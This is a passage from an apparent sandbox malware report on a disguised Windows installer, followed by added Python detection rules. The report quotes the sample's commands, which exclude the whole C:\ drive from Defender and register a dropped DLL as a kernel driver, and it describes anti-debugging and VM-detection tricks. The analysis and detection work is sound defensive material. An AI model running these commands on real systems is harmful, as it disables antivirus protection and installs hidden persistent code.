Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static file information: File size 5694753 > 1048576
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1801210662.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1800990919.0000000003840000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_004057D0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: real checksum: 0x0 should be: 0x56ef0c
Source: update.vac.1.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: updat4.vac.6.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: real checksum: 0x0 should be: 0x34399d
Source: update.vac.6.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x34399d
Source: tProtect.dll.12.dr Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: section name: .didata
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: section name: .didata
Source: update.vac.1.dr Static PE information: section name: .00cfg
Source: update.vac.1.dr Static PE information: section name: .voltbl
Source: update.vac.1.dr Static PE information: section name: .j)q
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .j)q
Source: is-7F262.tmp.6.drStatic PE information: section name: .xdata
Source: updat4.vac.6.drStatic PE information: section name: .00cfg
Source: updat4.vac.6.drStatic PE information: section name: .voltbl
Source: updat4.vac.6.drStatic PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA6750B push ecx; ret 6_2_6CA6751E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C910F00 push ss; retn 0001h6_2_6C910F0A
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB34F10 push eax; ret 6_2_6CB34F2E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA999F4 push 004AC35Ch; ret 6_2_6CA99A0E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB35290 push eax; ret 6_2_6CB352BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003845F4 push 0042C35Ch; ret 10_2_0038460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041FB10 push eax; ret 10_2_0041FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041FE90 push eax; ret 10_2_0041FEBE
Source: update.vac.1.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: update.vac.6.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: updat4.vac.6.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\update.vacJump to dropped file
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-7F262.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5147
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4572
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Window / User API: threadDelayed 569
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Window / User API: threadDelayed 536
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Window / User API: threadDelayed 506
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-7F262.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\updat4.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | API coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696 | Thread sleep count: 5147 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696 | Thread sleep count: 4572 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA598B0 FindFirstFileA,FindClose, 6_2_6CA598B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00386868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00386868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00387496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00387496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00389C60 GetSystemInfo, 10_2_00389C60
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000002.1774496538.000000000164C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}c
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000002.1774496538.000000000164C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C8E3886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6C8E3886
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA6EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CA6EFA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_004057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_004057D0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA6DF9D mov eax, dword ptr fs:[00000030h] 6_2_6CA6DF9D
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA78B86 mov eax, dword ptr fs:[00000030h] 6_2_6CA78B86
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA78B55 mov eax, dword ptr fs:[00000030h] 6_2_6CA78B55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA6EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CA6EFA1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA67ADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CA67ADD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" (excludes the entire system drive from Windows Defender scanning)
Source: tProtect.dll.12.dr | Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto (registers the dropped DLL as an auto-start kernel-mode driver service)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (32 identical invocations)
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
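
The rows above (a Defender exclusion for the whole of C:\, an `sc create ... type= kernel` whose binPath is a .dll, and, in the Anti Debugging section, NtSetInformationThread with class 0x11 plus a DebugPort query) are the ones a detection engineer turns into rules. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it decodes the NT information classes and parses the two command lines. The rule names, severity levels and the event-dict shape are the editor's assumptions, and the sample events are constructed from the rows above.

```python
"""Triage rules over the evidence rows a sandbox report lists for one sample.

Added example (the editor's code, not Joe Sandbox's and not the sample's). Rule
names, severities and the event dict shape are assumptions; SAMPLE_EVENTS is
constructed from the report rows.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# NT information-class values (winternl/ntddk) the rules decode.
THREAD_INFO_CLASSES = {0x11: "ThreadHideFromDebugger"}
PROCESS_INFO_CLASSES = {
    0x07: "ProcessDebugPort",
    0x1D: "ProcessBreakOnTermination",  # critical process: killing it bugchecks the machine
    0x1E: "ProcessDebugObjectHandle",
    0x1F: "ProcessDebugFlags",
}
MP_EXCLUSION_RE = re.compile(
    r"""\b(?:Add|Set)-MpPreference\b[^;|]*?-Exclusion(Path|Process|Extension)\s+(['"]?)([^'"]+)\2""",
    re.IGNORECASE,
)
DRIVE_ROOT_RE = re.compile(r"[A-Za-z]:\\?")


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def check_defender_exclusion(cmdline: str) -> list[Finding]:
    """Flag Add-/Set-MpPreference exclusions; a drive root excludes the whole system."""
    findings = []
    for kind, _quote, value in MP_EXCLUSION_RE.findall(cmdline):
        for item in (v.strip() for v in value.split(",") if v.strip()):
            broad = kind.lower() == "path" and DRIVE_ROOT_RE.fullmatch(item) is not None
            detail = f"Exclusion{kind} {item!r}"
            if broad:
                detail += " (entire drive excluded from scanning)"
            findings.append(Finding("defender_exclusion", "high" if broad else "medium", detail))
    return findings


def check_sc_create(cmdline: str) -> list[Finding]:
    """Flag services registered through sc.exe; kernel type plus a non-.sys image is the worst case."""
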